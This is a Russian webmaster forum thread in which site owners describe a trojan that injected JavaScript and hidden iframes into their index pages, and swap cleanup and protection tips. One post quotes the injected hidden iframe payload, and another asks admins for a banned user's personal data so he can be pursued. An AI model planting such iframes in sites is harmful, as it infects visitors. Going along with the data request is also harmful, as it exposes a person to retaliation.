- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Вот и я подцепил похожий вирус.
На многих сайтах в файлы с именем "index" вставлен код java-скрипта, начало и конец которого сопровождается: <!-- ~df~ -->.
Тоже самое было, вначале думал что это из-за кривого скрипта опросника, а оказалось троянец :)
Трояна распространял персонаж под ником NC.Luther, свежезабаненный на этом форуме. Просьба к админам- отдайте все его данные что у вас в базе, я позабочусь о нем через кое-какие украинские структуры, если он с Украины как писал.
Делаем так :
1) Отгрызаем от винта 1.5 гига на новый раздел. Ставим туда новую систему ИСКЛЮЧИТЕЛЬНО для работы с AllSubmiter и после работы форматим раздел и потом востанавливаем его из копии, сохранёной перед работой в другом разделе.
2) Ещё можно сделать попроще : делаем учётную запись гостя - из под неё запускаем Субмитер. Гость не имеет права корячить реестр и системные файлы т.е сама винда не пострадает. Но я не знаю, будет ли работать такое дело т.к ещё не проверял.
3) Наймите кого нить для прогона :) Сбережёте нервы и машину :)
Делаем так :
1) Отгрызаем от винта 1.5 гига на новый раздел. Ставим туда новую систему ИСКЛЮЧИТЕЛЬНО для работы с AllSubmiter и после работы форматим раздел и потом востанавливаем его из копии, сохранёной перед работой в другом разделе.
2) Ещё можно сделать попроще : делаем учётную запись гостя - из под неё запускаем Субмитер. Гость не имеет права корячить реестр и системные файлы т.е сама винда не пострадает. Но я не знаю, будет ли работать такое дело т.к ещё не проверял.
3) Наймите кого нить для прогона :) Сбережёте нервы и машину :)
Антивирусы, я так понимаю нынче не в моде. Или вам вероисповедание им не позволяет ими пользоваться? Вы случайно не врач? Они перректальные методы практикуют...
Антивирусы, я так понимаю нынче не в моде. Или вам вероисповедание им не позволяет ими пользоваться? Вы случайно не врач? Они перректальные методы практикуют...
Если бы они ловили бы их, а то ручками их отлавливаешь 😂 😂 😂 Более менее опора на ЗонеАларм. Но с ним тоже геморно, то фтп постоянно из-за него рвется, то в админку CMS-ки не войти 😒
Мы тут решили расстрельную машину поставить, только для юзанья по каталогам.
Однозначно рулит Drweb + Zonealarm .
Если сидите на ADSL, то счастье обретается покупкой сетевого модема с роутером (в нём аппаратный файрвол). 3-й год сижу со старичком Zyxel OMNI ADSL LAN EE - ни одна бяка не проскочила. Антивируса просто нет, ибо нах не нужен. А почтовые вложения левые не открывать у меня, слава богу, мозгов хватает.
Антивирусы, я так понимаю нынче не в моде. Или вам вероисповедание им не позволяет ими пользоваться?
Многие антивирусы пропускают. Только поочередно все антивирусы в комплексе вроде как все отлавливают.
У меня все больше усиливается ощущение что разработчики антивирусов сами некоторые неопасные вирусы и пишут на радость юзеру :), а если что то серьезное подхватил то все эти касперсике, ноды как мертвому припарка.
Ну вот и мой сайт словил.
<iframe src='http://…...biz/traff/iframe.php?u=all' height='0' width='0' scrolling='no' frameborder='no'></iframe>
Обратил внимание, когда насторожила необычно долгая загрузка главной.
Пока нашел только в index страницах. Поудалял.
Должен отметить, что и Norton и DrWeb увидели сразу. Всем удачи в борьбе.
Здрасьте, вот и я попался.... :( NOD 32 первоначально нашел его, но при удалении убил и часть системы. Пришлось начинать с нуля... Поставил винду, все проги, хостер заверил меня, что файлы он почистил... Резалт - перекинл файлы на локал и бабах!!! :) Щас придется читать досконально всю эту ветку и ковыряться вручную.... Думаю, все в курсе сколько нервов стОит переставить винду и начать с нуля фактически... :)
Самое обидное и грызущее совесть - эта дрянь вроде все еще висит на сайте и заражает всех юзеров с "дырявыми" эксплорерами... А сам боюсь проверить - там он все еще или уже нет... :) Есть ли способы проверить наверняка присутствует ли там эта дрять не эксплорером?
NOD32 удаляет его нормально. Правда библиотеку ИЕ тоже удаляет, ИЕ отказывается работать. И блокирует его на отлично.
Я хоть и учавствовал в этой ветку, а всё же наступил на эти грабли.
Меня насторожило одно. Не во все indexы он код дописывает. Думаю, что кто-то ручками работает. Ибо не во все шаблоны джумлы код прописали, а только в тот который подгружается.